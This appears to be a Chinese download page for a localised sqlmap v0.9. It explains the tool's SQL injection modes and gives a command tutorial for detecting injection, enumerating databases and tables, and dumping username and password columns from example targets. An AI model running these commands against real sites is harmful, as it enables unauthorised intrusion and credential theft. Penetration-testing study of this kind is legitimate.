分类

七喜软件园->数据库类->sqlmap下载安装 v0.9 完整汉化版
sqlmap下载安装 v0.9 完整汉化版

sqlmap下载安装 v0.9 完整汉化版

大小:6.9M更新日期:2020/5/26

类别:数据库类下载量:63207

379
34
反馈投诉
下载到手机 注:本软件为电脑软件,不适用于手机用户安装。

    sqlmap是一款专业的sql注入工具,普遍适用于渗透测试,可以帮助用户发现数据库中存在的漏洞与风险,从而制定针对性解决方案。本次为大家带来的是sqlmap完整汉化版,内置简体中文支持,理解和使用都会更加的容易,不再以受到英语水平困扰,特被适合风险评估的朋友使用。

    sqlmap拥有非常强大的检测引擎,能够自动检测和利用SQL注入漏洞,并且支持MySQL、Oracle、PostgreSQL等众多常见数据库,功能十分强大。

    sqlmap

    sqlmap特色介绍:

    1、这是一款开源的渗透测试工具;

    2、能够自动检测和利用SQL注入漏洞以及接入该数据库的服务器;

    3、具有多种特性的渗透测试器;

    4、支持五种不同的注入模式。

    sqlmap注入模式介绍:

    UNION query SQL injection(可联合查询注入)

    Error-based SQL injection(报错型注入)

    Boolean-based blind SQL injection(布尔型注入)

    Time-based blind SQL injection(基于时间延迟注入)

    Stacked queries SQL injection(可多语句查询注入)

    英文看不懂的朋友可以对照下方的中文注释。

    1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

    2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

    3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

    4、联合查询注入,可以使用union的情况下的注入。

    5、堆查询注入,可以同时执行多条语句的执行时的注入。

    sqlmap安装教程:

    1、下载完成后解压;

    sqlmap安装步骤1

    2、使用cmd命令运行sqlmap;

    sqlmap安装步骤2

    3、记住要使用python2运行。

    sqlmap使用教程:

    【检测注入】

    sqlmap -u “http://www.vuln.cn/post.php?id=1”

    默认使用level1检测全部数据库类型

    sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3

    指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)

    【cookie注入】

    当程序有防get注入的时候,可以使用cookie注入

    sqlmap -u “http://www.xxx.com/shownews.asp” –cookie “id=11” –level 2(只有level达到2才会检测cookie)

    【从post数据包中注入】

    可以使用burpsuite或者temperdata等工具来抓取post包

    sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数

    【获取数据库基本信息】

    sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 –dbs

    查询有哪些数据库

    sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test –tables

    查询test数据库中有哪些表

    sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin –columns

    查询test数据库中admin表有哪些字段

    sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin -C “username,password” –dump

    dump出字段username与password中的数据

    sqlmap注入教程:

    1.对url进行检测,判断是否存在SQL注入

    python sqlmap.py -u "url" --batch

    跑完以后发现存在注入,,参数是username 注入类型为盲注,数据库是mysql,后端语言是jsp

    2.获取数据库

    python sqlmap.py -u URL --dbs --batch 获取全部数据库

    python sqlmap.py -u URL --current-db --batch 获取当前数据库

    获取到了当前的数据库为 wavsepDB

    3.获取当前数据库里所有表

    python sqlmap.py -u URL -D wavsepDB --tables --batch

    4.获取表的字段

    python sqlmap.py -u URL -D wavsepDB -T users --columns --batch

    如图获取到上面字段以后,我们就开始dump字段内容了。

    5.dump字段内容

    python sqlmap.py -u URL -D wavsepDB -T users -C "password,username" --dump --batch

    如果字段内容多的话可以再加上如 --start 1 --stop 100 这样就取1-100条数据

    --dump 可以换成 --dump-all则导出全部的内容

    sqlmap常用命令:

    sqlmap -u [“url”] --dbs #获取数据库

    sqlmap -u [“url”] --current-user #获取当前用户名称 :

    sqlmap -u [“url”] --current-db #获取当前数据库名称

    sqlmap -u [“url”] -D [‘数据库名’] --tables #列出表名 :

    sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns #列出字段

    sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump #获取字段内容

    精品推荐

    相关下载

    热门标签
    软件排行榜
    最新更新
    网友评论
    我要跟贴
    • 湖南怀化移动 网友 眉目里

      真的管用?

    • 广西北海移动 网友 朝夕盼兮

      不知道更不更新后续版本呢?

    • 广西玉林电信 网友 这样就好

      好东西,马上试试效果!

    • 浙江绍兴联通 网友 梨花雨凉

      刚好需要用

    • 陕西安康电信 网友 半字浅眉-

      小东西实用

    +
    0